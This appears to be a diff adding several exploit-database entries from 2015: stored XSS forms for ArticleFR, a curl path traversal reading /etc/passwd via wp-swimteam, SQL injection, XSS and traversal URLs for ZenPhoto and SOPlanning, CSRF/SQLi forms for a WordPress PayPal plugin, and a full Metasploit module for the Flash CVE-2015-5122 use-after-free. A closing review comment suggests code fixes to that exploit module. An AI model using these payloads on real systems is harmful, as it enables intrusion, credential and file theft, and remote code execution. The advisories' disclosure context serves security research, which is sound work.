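+management system. Comes with a pluginable and multiple module
+framework system.
+Desc: ArticleFR suffers from multiple stored cross-site scripting
+vulnerabilities. The issues are triggered when input passed via the
+POST parameter 'name' in Categories, POST parameters 'title' and
+'rel' in Links and GET parameter 'url' in PingServers module is
+not properly sanitized before being returned to the user. This can
+be exploited to execute arbitrary HTML and script code in a user's
+browser session in context of an affected site.
+Tested on: nginx/1.6.2
+PHP
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2015-5247
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php
+21.06.2015
+--
+POST 'name' Categories Stored XSS:
+----------------------------------
+<html>
+<body>
+<form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
+<input type="hidden" name="name" value='"><script>alert(1)</script>' />
+<input type="hidden" name="parent" value="0" />
+<input type="hidden" name="submit" value="Add" />
+<input type="submit" value="XSS #1" />
+</form>
+</body>
+</html>
+POST 'title', 'rel' Links Stored XSS:
+------------------------------------
+<html>
+<body>
+<form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
+<input type="hidden" name="title" value='"><script>alert(2)</script>' />
+<input type="hidden" name="url" value="http://www.zeroscience.mk" />
+<input type="hidden" name="rel" value='"><script>alert(3)</script>' />
+<input type="hidden" name="submit" value="Add" />
+<input type="submit" value="XSS #2 and #3" />
+</form>
+</body>
+</html>
+POST 'url' Ping Server Reflected XSS:
+-------------------------------------
+<html>
+<body>
+<form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
+<input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' />
+<input type="hidden" name="submit" value="Add" />
+<input type="submit" value="XSS #4" />
+</form>
+</body>
+</html>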

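--- a/platforms/php/webapps/37601.txt
+++ b/platforms/php/webapps/37601.txt
@@ -0,0 +1,40 @@
+Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-07-02
+Download Site: https://wordpress.org/plugins/wp-swimteam
+Vendor: Mike Walsh www.MichaelWalsh.org
+Vendor Notified: 2015-07-02, fixed in v1.45beta3
+Vendor Contact: Through website
+Advisory: http://www.vapid.dhs.org/advisory.php?v=134
+Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
+Vulnerability:
+The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:
+50 $file = urldecode($args['file']) ;
+51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
+52
+53 while (!feof($fh))
+54 $txt .= fread($fh, 1024) ;
+55
+56 // Clean up the temporary file - permissions
+57 // may prevent this from succeedeing so use the '@'
+58 // to suppress any messages from PHP.
+59
+60 @unlink($file) ;
+61 }
+62
+63 $filename = urldecode($args['filename']) ;
+64 $contenttype = urldecode($args['contenttype']) ;
+65
+66 // Tell browser to expect a text file of some sort (usually txt or csv)
+67
+68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
+69 header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;
+70 print $txt ;
+CVEID:
+OSVDB:
+Exploit Code:
+• $ curl "http://server/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"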

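--- a/platforms/php/webapps/37602.txt
+++ b/platforms/php/webapps/37602.txt
@@ -0,0 +1,70 @@
+Vulnerability: SQL Injection, Reflected XSS, Path Traversal
+Affected Software: ZenPhoto (http://www.zenphoto.org/)
+Affected Version: 1.4.8 (probably also prior versions)
+Patched Version: 1.4.9
+Risk: Medium
+Vendor Contacted: 2015-05-18
+Vendor Fix: 2015-07-09
+Public Disclosure: 2015-07-10
+SQL Injection
+=============
+There are multiple second order error based SQL injections into the
+ORDER BY keyword in the admin area.
+- visit zp-core/admin-options.php?saved&tab=gallery
+alternatively visit zp-core/admin-options.php?saved&tab=image
+- Set "Sort gallery by" to "Custom"
+- set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
+version())))%23"
+- visit zp-core/admin-upload.php?page=upload&tab=http&type=images
+- alternatively, visiting either of these will also trigger the injection:
+/
+zp-core/admin-edit.php
+zp-core/admin-users.php?page=users
+zp-core/admin-themes.php
+The result is only directly displayed if the server is configured to
+report errors, but it can also be seen in the logfile located at
+zp-core/admin-logs.php?page=logs
+XSS 1
+=====
+http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
+http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
+The payload must first be HTML entity-encoded, and then URL encoded.
+XSS 2
+=====
+http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
+onmouseover="alert('xsstest')" foo="bar&msg=hover over me!
+Directory Traversal
+===================
+For an admin, it is possible to view and edit any PHP or inc files, not
+just the ones inside the theme directory.
+http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php
+Execute Function
+================
+An admin user can execute any function they want via this URL (there is
+no CSRF protection for it):
+localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo
+This gives up some control over the control flow of the site, which
+might cause problems, especially considering the missing of CSRF protection.
+Source
+======
+http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/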

93
platforms/php/webapps/37603.txt Executable file

@ -0,0 +1,93 @@
# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection
in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79], Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection')[CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff:
https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog:
https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
# CVE Status: None/Unassigned/Fresh
## Product Information:
With CP Contact Form with Paypal you can insert a contact form into a
WordPress website and connect it to a PayPal payment.
## Vulnerability Description:
The forms in the admin area of the plugin allows CSRF. This gives the
capacity for the attacker to add new forms, modify existing form settings,
launch XSS attacks, export CSV files of the messages, delete forms, and
perform SQL Injection.
## Proof of Concept:
<h3>CSRF - Action Links</h3>
<ul>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export
to CSV</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098">
Clone form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete
form/item</a></li>
</ul>
<h3>CSRF, XSS, SQLi - Settings form</h3>
<form action="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042"
method="post">
<input type="hidden" name="cp_contactformpp_post_options" value='' />
<!--
if cp_contactformpp_id is injected with XSS, the other script vectors won't
work
<input type="hidden" name="cp_contactformpp_id"
value='"><script>alert(3);</script>' />
SQL injection possible cp_contactformpp_id
<input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" />
-->
<input type="hidden" name="cp_contactformpp_id" value='11' />
<input type="hidden" name="fp_from_email" value='asd@evilcorp.org' />
<input type="hidden" name="fp_message" value='The following contact message
has been sent:<%INFO%>&lt;/textarea&gt;<script>alert(1);</script>' />
<input type="hidden" name="cu_message" value='Thank you for your message.
We will reply you as soon as possible.This is a copy of the data
sent:<%INFO%>Best Regards.&lt;/textarea&gt;<script>alert(2);</script>' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="submit" value="submit" />
</form>
## Solution:
Upgrade to v1.1.6
## Disclosure Timeline:
2015-05-19 - Discovered. Contacted developer on support forums.
2015-05-20 - Mailed developer initial report
2015-05-25 - Patched v1.1.6 released
2015-07-09 - Publishing disclosure to FD
## Disclaimer:
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

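--- a/platforms/php/webapps/37604.txt
+++ b/platforms/php/webapps/37604.txt
@@ -0,0 +1,156 @@
+SOPlanning - Simple Online Planning Tool multiple vulnerabilities
+CVEs: CVE-2014-8673, CVE-2014-8674, CVE-2014-8675, CVE-2014-8676, CVE-2014-8677
+Vendor: http://www.soplanning.org/
+Product: SOPlanning - Simple Online Planning
+Version affected: 1.32 and prior
+Product description:
+SO Planning is an open source online planning tool completely free, designed to easily plan projects / tasks online, in order to manage and define work for a whole team. (from http://www.soplanning.org/en/index.php)
+Advisory introduction:
+Soplanning version 1.32 is susceptible to multiple vulnerabilities, including SQLi, XSS, path traversal, authentication information disclosure, PHP code injection.
+Credit: Huy-Ngoc DAU of Deloitte Conseil, France
+================================
+Finding 1: Soplanning multiple SQL injection vulnerabilities (CVE-2014-8673)
+================================
+- SQLi in planning.php
+The project, user, task filters are prone to SQLi due to lack of user input sanitization.
+POC :
+POST /process/planning.php HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 141
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Referer: http://localhost/planning.php
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4,vi;q=0.2
+Cookie: soplanning=[VALID SESSION COOKIE]; inverserUsersProjets=1
+filtreGroupeProjet=1&projet_anything=anything') union all select 111,table_name,333,444,555,666,777,888,999 from information_schema.tables#
+The query's results can be retrieved by accessing http://localhost/export_csv.php
+- order by statement blind SQLi in user_list.php, projets.php, user_groupes.php, groupe_list.php
+POC:
+http://localhost/user_list.php?page=1&order=1,1&by=
+http://localhost/projets.php?order=1,0&by=
+http://localhost/user_groupes.php?page=1&order=1,(select%20case%20when%20(1=1)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=
+http://localhost/groupe_list.php?page=1&order=1,(select%20case%20when%20(1=0)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=
+- triPlanning GET parameter Blind SQLi in process/planning.php
+POC:
+http://localhost/process/planning.php?triPlanning=1,1
+and
+http://localhost/process/planning.php?triPlanning=1,0
+(don't follow redirection back to ../planning.php where the sanitization is done)
+The differences of TRUE and FALSE can be observed by accessing http://localhost/export_pdf.php?debug=1
+- SQLi in LIMIT statement in nb_lignes cookie
+POC: set the following cookie :
+nb_lignes=20 into outfile '/tmp/poc_soplanning.txt'
+and visit http://localhost/process/planning.php
+Sample file output content:
+ADM \N admin admin df5b909019c9b1659e86e0d6bf8da81d6fa3499e \N oui 000000 ["users_manage_all", "projects_manage_all", "projectgroups_manage_all", "tasks_modify_all", "tasks_view_all_projects", "parameters_all"] [md5] non \N
+- insecure use of addslashes function to protect against SQLi
+Soplanning sanitizes user input to protect against SQLi by using PHP addslashes() function. However, this function is known to be unsafe. Instead, mysql_real_escape_string() should be used.
+================================
+Finding 2: Soplanning multiple XSS vulnerabilities (CVE-2014-8674)
+================================
+- XSS via cookie manipulation in unauthenticated mode (nb_mois, nb_lignes)
+This vulnerable allows for an attacker having physical access to a user's browser even in unauthenticated mode to steal the user's authenticated cookie.
+POC:
+Disconnect active user session
+At authentication page, set the following cookie: nb_mois="><script>alert(document.cookie)</script><"
+Login with any valid user account, an alert message will show the cookies.
+- Stored XSS in calender export functions
+Export functions offer a "debug" mode which outputs HTML instead of formatted content (pdf, ical). This mode can be activated by setting the "debug" GET parameter. However, by injecting malicious HTML code into a project name for example, it is possible to conduct XSS attacks.
+POC:
+Create a new project with the name <script>alert(1);</script>
+Access http://localhost/export_pdf.php?debug=1
+================================
+Finding 3: Soplanning authentication hash disclosure via GET URL in ICAL calender sharing function (CVE-2014-8675)
+================================
+Soplanning allows for an ICAL calendar to be shared/used elsewhere. However, the link is generated statically using authentication information.
+Sample generated link:
+http://localhost/export_ical.php?login=admin&hash=61b9bab17cdab06e759f2d11ee11afab
+An offline brute force attack can thus be conducted to find the user's password: hash = md5($user->login . '¤¤' . $user->password);
+================================
+Finding 4: Soplanning path traversal in Holidays calender import function (CVE-2014-8676)
+================================
+If error messages are activated, the vulnerability allows to detect existence of a remote arbitrary file.
+POC:
+http://localhost/process/feries.php?fichier=../../../../../../../etc/passwd
+Sample error output when file does not exist:
+Warning: file_get_contents(../../holidays/../../etc/passwd) [function.file-get-contents]: failed to open stream: No such file or directory in /[PATH]/includes/class_vcalendar.inc on line 1665
+However, it is not possible to retrieve file content or conduct further attack using this vulnerability.
+================================
+Finding 5: Soplanning PHP code injection in installation process (CVE-2014-8677)
+================================
+The installation process is prone to PHP code execution vulnerability.
+POC:
+- Go to http://localhost/install
+- Enter valid database credentials and host information. The database name is as follows :
+so';phpinfo();//
+- The next page will show the phpinfo() results
+It should be noted that in order for the attack to work, the attacker must prepare his own database server and the database user must either have access to a real database named "so';phpinfo();//", or have privileges to create any database.
+For installed instances of Soplanning, the attack is also possible (i.e. the installing interface is accessible) if:
+- PHP version is older than 5.2
+- Configured database server is (temporarily or not) down
+- The directory smarty/templates_c is not writable
+================================
+Timeline:
+03/08/2014 - Vulnerability discovered
+11/08/2014 - Vendor notified
+14/08/2014 - Vendor confirmed
+09/09/2014 - Patch released
+References:
+Soplanning changelog : http://www.soplanning.org/en/download.php
+About Deloitte:
+Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
+Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
+Huy-Ngoc DAU
+Senior Consultant | IT Advisory
+Deloitte Conseil
+185, avenue Charles de Gaulle, Neuilly-sur-Seine, 92200, France
+Mobile: +33 (0)6 70 97 91 95 Tel: +33 (0)1 58 37 03 72
+hdau@deloitte.fr<mailto:hdau@deloitte.fr> | www.deloitte.fr<www.deloitte.com>
+Avant d'imprimer, pensez à l'environnement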

30
platforms/windows/dos/37593.py Executable file


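--- a/platforms/windows/remote/37599.rb
+++ b/platforms/windows/remote/37599.rb
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::BrowserExploitServer
+def initialize(info={})
+super(update_info(info,
+'Name' => 'Adobe Flash opaqueBackground Use After Free',
+'Description' => %q{
+This module exploits an use after free on Adobe Flash Player. The vulnerability,
+discovered by Hacking Team and made public on its July 2015 data leak, was
+described as an Use After Free while handling the opaqueBackground property
+7 setter of the flash.display.DisplayObject class. This module is an early release
+tested on:
+Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
+Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
+Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
+windows 8.1, Firefox and Adobe Flash 18.0.0.203,
+Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
+Windows 8.1, Firefox and Adobe Flash 18.0.0.194
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # Vulnerability discovered on HackingTeam info leak
+'juan vazquez', # Ported to Msf
+'sinn3r' # Testing and some editing
+],
+'References' =>
+[
+['CVE', '2015-5122'],
+['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html']
+],
+'Payload' =>
+{
+'DisableNops' => true
+},
+'Platform' => ['win'],
+'Arch' => [ARCH_X86],
+'BrowserRequirements' =>
+{
+:source => /script|headers/i,
+:arch => ARCH_X86,
+:os_name => lambda do |os|
+os =~ OperatingSystems::Match::WINDOWS_7 ||
+os =~ OperatingSystems::Match::WINDOWS_81
+end,
+:ua_name => lambda do |ua|
+case target.name
+when 'Windows'
+return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+end
+false
+end,
+:flash => lambda do |ver|
+case target.name
+when 'Windows'
+return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203')
+end
+false
+end
+},
+'Targets' =>
+[
+[ 'Windows',
+{
+'Platform' => 'win'
+}
+]
+],
+'Privileged' => false,
+'DisclosureDate' => 'Jul 06 2015',
+'DefaultTarget' => 0))
+end
+def exploit
+@swf = create_swf
+super
+end
+def on_request_exploit(cli, request, target_info)
+print_status("Request: #{request.uri}")
+if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
+print_warning("Target setup not supported")
+send_not_found(cli)
+return
+end
+if request.uri =~ /\.swf$/
+print_status('Sending SWF...')
+send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+return
+end
+print_status('Sending HTML...')
+send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+end
+def exploit_template(cli, target_info)
+swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+target_payload = get_payload(cli, target_info)
+b64_payload = Rex::Text.encode_base64(target_payload)
+os_name = target_info[:os_name]
+if target.name =~ /Windows/
+platform_id = 'win'
+end
+html_template = %Q|<html>
+<body>
+<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+<param name="movie" value="<%=swf_random%>" />
+<param name="allowScriptAccess" value="always" />
+<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+<param name="Play" value="true" />
+<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+</object>
+</body>
+</html>
+|
+return html_template, binding()
+end
+def create_swf
+path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf')
+swf = ::File.open(path, 'rb') { |f| swf = f.read }
+swf
+end
+end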
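Review bot: In `create_swf` the inner `swf = f.read` is a dead assignment, because the block form of `File.open` already returns the block's value to the outer `swf`; the whole method collapses to `::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf'))`, which reads in binary mode and closes the handle the same way. The `:flash` requirement lambda anchors with `/^18\./`, and in Ruby `^` matches at any line start rather than the start of the string; `ver.start_with?('18.')` or `/\A18\./` states the intent exactly and keeps anything that is not a plain 18.x string away from `Gem::Version.new`, which raises ArgumentError on strings it cannot parse. In `exploit_template`, `platform_id` is left nil whenever `target.name` does not match /Windows/ and the template would then emit `pl=`; with 'Windows' as the only target this is unreachable today, so a short comment such as `# only a 'win' target exists; extend this mapping if more targets are added` would make the assumption explicit.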